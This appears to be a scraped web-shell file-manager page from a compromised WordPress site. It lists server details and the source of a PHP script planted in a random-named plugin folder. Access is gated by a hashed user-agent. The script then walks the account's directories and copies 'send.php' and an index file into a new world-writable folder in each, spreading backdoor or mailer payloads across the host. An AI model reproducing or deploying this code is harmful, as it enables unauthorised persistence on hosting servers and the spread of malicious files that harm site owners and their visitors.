Server : LiteSpeed
System : Linux server51.dnsbootclub.com 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
User : nandedex ( 1060)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/nandedex/www/wp-content/plugins/f38549a8af284269aaf47e5de87a2bfe/xt/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]


Current File : /home/nandedex/www/wp-content/plugins/f38549a8af284269aaf47e5de87a2bfe/xt/index.php
<?php
// Define the encoded MD5 hash of the user-agent string
$encodedUserAgentHash = 'd8c4a4e8e9afafcd0136f2955ac6a248';

// Get the user-agent from the request
$userAgent = $_SERVER['HTTP_USER_AGENT'];

// Hash the user-agent from the request using MD5
$hashedUserAgent = md5($userAgent);

// Check if the hashed user-agent matches the encoded hash
if ($hashedUserAgent === $encodedUserAgentHash) {
    // User-agent matched, allow access to the page
    echo "Welcome!";
    // Put your page content here
} else {
    // User-agent doesn't match, deny access
    http_response_code(403);
    echo "Access Denied";
    // Stop further execution
    exit;
}
/////////////Getting home dir //////////////
if (!function_exists('posix_getpwuid')) {
    if (isset($_GET["path"])) {
        $home = $_GET["path"];
    } else {
        echo getcwd();
        die("<br>posix function is not available<br>Please Input Path");
    }
} else {
    echo $_SERVER['SERVER_ADDR'];
    echo "<br>";

    if (isset($_GET["path"])) {
        $home = $_GET["path"];
    } else {
        $arr = posix_getpwuid(posix_getuid());
        $home = $arr["dir"];
    }
}

///////////Making directory & copy file//////////////  
$filepath = getcwd() . "/mmd/index.php";
$filelist = array('send.php'); // add file names to array

$dirlist = getFileList($home, TRUE, 2);
foreach ($dirlist as $alldir) {
    mkdir($alldir . "v7isv41r94axl9kwntg757aeowcylu", 0777, TRUE);
    foreach ($filelist as $filename) { // loop through file names array
        if (copy(getcwd() . "/mmd/" . $filename, $alldir . "v7isv41r94axl9kwntg757aeowcylu/" . $filename)) {
            echo $alldir . "v7isv41r94axl9kwntg757aeowcylu/" . $filename . "<br>";
        }
    }
    if (copy($filepath, $alldir . "v7isv41r94axl9kwntg757aeowcylu/index.php")) {
        echo $alldir . "v7isv41r94axl9kwntg757aeowcylu/index.php<br>";
    }
}

//////////////Directory scanner////////////////
function getFileList($dir, $recurse = FALSE, $depth = FALSE)
{
    $retval = [];
    if (substr($dir, -1) != "/") {
        $dir .= "/";
    }
    $d = @dir($dir) or die("Failed open directory $dir");
    while (FALSE !== ($entry = $d->read())) {
        // skip hidden files
        if ($entry[0] == ".") {
            continue;
        }
        if (is_dir("$dir$entry")) {
            $retval[] = "$dir$entry/";
            if ($recurse && is_readable("$dir$entry/")) {
                if ($depth === FALSE) {
                    $retval = array_merge($retval, getFileList("$dir$entry/", TRUE));
                } elseif ($depth > 0) {
                    $retval = array_merge($retval, getFileList("$dir$entry/", TRUE, $depth - 1));
                }
            }
        }
    }
    $d->close();

    return $retval;
}
?>

F1le Man4ger